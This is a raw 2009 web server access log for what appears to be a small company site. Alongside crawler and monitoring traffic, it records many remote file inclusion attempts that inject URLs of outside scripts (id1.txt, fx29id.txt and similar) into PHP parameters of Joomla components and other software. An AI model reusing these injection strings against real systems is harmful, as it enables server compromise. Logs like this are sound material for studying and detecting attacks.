91.191.35.118 - - [26/Jul/2009:00:59:19 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
87.20.186.139 - - [26/Jul/2009:00:59:22 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:59:23 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [26/Jul/2009:00:59:55 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [26/Jul/2009:00:59:55 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:01:01:41 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Jul/2009:01:01:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.210.178 - - [26/Jul/2009:01:02:22 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:01:02:22 -0400] "GET /logs/error_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.237.66.229 - - [26/Jul/2009:01:02:38 -0400] "GET /logs/access_log.Q109062600//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:04:08 -0400] "GET /images/_notes/home_welcome2.jpg.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:01:06:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.28.140 - - [26/Jul/2009:01:07:47 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:08:43 -0400] "GET /errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:08:43 -0400] "GET /logs/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:08:43 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:01:09:10 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:01:09:10 -0400] "GET /errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:01:09:10 -0400] "GET /logs/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:01:09:22 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.120.119.213 - - [26/Jul/2009:01:09:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
62.120.119.213 - - [26/Jul/2009:01:09:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
74.6.22.169 - - [26/Jul/2009:01:10:07 -0400] "GET /logs/error_log.Q109012600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.120.119.213 - - [26/Jul/2009:01:10:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
62.120.119.213 - - [26/Jul/2009:01:10:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
222.236.47.192 - - [26/Jul/2009:01:10:35 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
222.236.47.192 - - [26/Jul/2009:01:10:35 -0400] "GET /logs/access_log.Q109061000//?_SERVER[DOCUMENT_ROOT]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.236.47.192 - - [26/Jul/2009:01:10:35 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:10:42 -0400] "GET /images/_notes/nav_store_search_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.50.143.90 - - [26/Jul/2009:01:10:57 -0400] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.236.47.192 - - [26/Jul/2009:01:11:02 -0400] "GET /logs/access_log.Q109052400//?_SERVER[DOCUMENT_ROOT]=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:01:11:28 -0400] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:01:11:28 -0400] "GET /logs/access_log.Q109063000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:01:11:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:01:12:06 -0400] "GET /errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:12:07 -0400] "GET /logs/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:12:07 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:13:17 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:14:21 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L202C143E0F71B60031D008C+WSEQ(S0060):1+OUITEM(A0200):3232000 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:01:15:13 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.22.169 - - [26/Jul/2009:01:16:33 -0400] "GET /logs/access_log.Q109061600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.80.195.34 - - [26/Jul/2009:01:16:39 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {A6ACEF75-1871-FAE7-42AF-30A2385AE092}; .NET CLR 1.1.4322)"
89.18.190.25 - - [26/Jul/2009:01:16:48 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://great-connections.com/bwwxx/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.18.190.25 - - [26/Jul/2009:01:16:48 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://great-connections.com/bwwxx/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.18.190.25 - - [26/Jul/2009:01:16:48 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://great-connections.com/bwwxx/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:01:16:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.18.190.25 - - [26/Jul/2009:01:16:55 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://great-connections.com/bwwxx/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:17:15 -0400] "GET /images/index19_pulseoxy.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.249.68.247 - - [26/Jul/2009:01:17:18 -0400] "GET /images/_notes/download_sell_miss_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.18.190.25 - - [26/Jul/2009:01:18:19 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://great-connections.com/bwwxx/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.18.190.25 - - [26/Jul/2009:01:18:25 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://great-connections.com/bwwxx/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:19:27 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:20:22 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:20:32 -0400] "GET //common/db.php?commonpath=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:20:32 -0400] "GET /logs//common/db.php?commonpath=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:20:46 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:01:21:03 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:01:21:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.110.19.24 - - [26/Jul/2009:01:22:50 -0400] "GET ///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:01:22:50 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:01:22:50 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:23:52 -0400] "GET /images/_notes/nav_store_search_name.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.50.143.90 - - [26/Jul/2009:01:24:50 -0400] "GET /logs/access_log.Q109063000%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:01:26:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:01:27:54 -0400] "GET /logs/access_log.Q109071100%20%20//common/db.php?commonpath=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:30:28 -0400] "GET /images/_notes/nav_store_cart_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.169 - - [26/Jul/2009:01:30:59 -0400] "GET /logs/error_log.Q109070600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Jul/2009:01:31:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.177.55 - - [26/Jul/2009:01:34:46 -0400] "GET /logs//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:01:34:46 -0400] "GET //?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:01:34:46 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:01:36:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:01:37:03 -0400] "GET /images/_notes/contact_mail.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.177.55 - - [26/Jul/2009:01:37:13 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
68.105.189.71 - - [26/Jul/2009:01:37:59 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 120309 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322)"
67.15.177.55 - - [26/Jul/2009:01:38:43 -0400] "GET /logs/access_log.Q109052000%20%20//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:39:01 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:39:01 -0400] "GET /logs/access_log.Q109070400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:39:01 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:39:05 -0400] "GET /logs/error_log.Q109070400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:39:24 -0400] "GET /logs/access_log.Q109070400%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:01:39:28 -0400] "GET /logs/error_log.Q109070400%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:41:12 -0400] "GET /logs/access_log.Q109070400%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:41:12 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:41:12 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:41:23 -0400] "GET /logs/error_log.Q109070400%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:42:44 -0400] "GET //admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:42:44 -0400] "GET /logs//admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:42:44 -0400] "GET /logs/access_log.Q109070900%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:43:37 -0400] "GET /images/_notes/ACE_logo.jpg.mno HTTP/1.1" 200 176 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
115.88.240.91 - - [26/Jul/2009:01:43:44 -0400] "GET /logs/access_log.Q109070400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:43:44 -0400] "GET /logs/error_log.Q109070400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:43:46 -0400] "GET /logs/access_log.Q109051000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:43:46 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:43:46 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 11072 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:44:32 -0400] "GET /logs/error_log.Q109051000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:45:08 -0400] "GET /logs/access_log.Q109070900//admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:45:30 -0400] "GET /logs/error_log.Q109070900//admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:01:48:11 -0400] "GET /logs/access_log.Q109052000//?path%5Bdocroot%5D=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:48:24 -0400] "GET /logs/access_log.Q109051000///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:01:49:58 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:01:49:58 -0400] "GET /errors.php?error=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:01:49:58 -0400] "GET /logs/errors.php?error=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:50:11 -0400] "GET /images/_notes/ace_bkgrd_wide.jpg.mno HTTP/1.1" 200 266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.78.129.7 - - [26/Jul/2009:01:50:26 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:50:40 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:50:40 -0400] "GET /logs/error_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:01:50:40 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:51:10 -0400] "GET //index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:51:10 -0400] "GET /logs//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:51:10 -0400] "GET /logs/access_log.Q109050900%20%20//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:01:51:18 -0400] "GET /images/index4_impltpcsstr.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
122.99.196.136 - - [26/Jul/2009:01:51:26 -0400] "GET /logs/error_log.Q109050900%20%20//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:01:51:44 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:51:48 -0400] "GET //index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:51:48 -0400] "GET /logs//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:51:48 -0400] "GET /logs/access_log.Q109050900%20%20//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:01:51:53 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:00 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:01 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:01 -0400] "GET /logs/access_log.Q109061000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:01:52:02 -0400] "GET /logs/error_log.Q109050900%20%20//index.php?sourcedir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:06 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:06 -0400] "GET /logs/access_log.Q109061000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:01:52:06 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
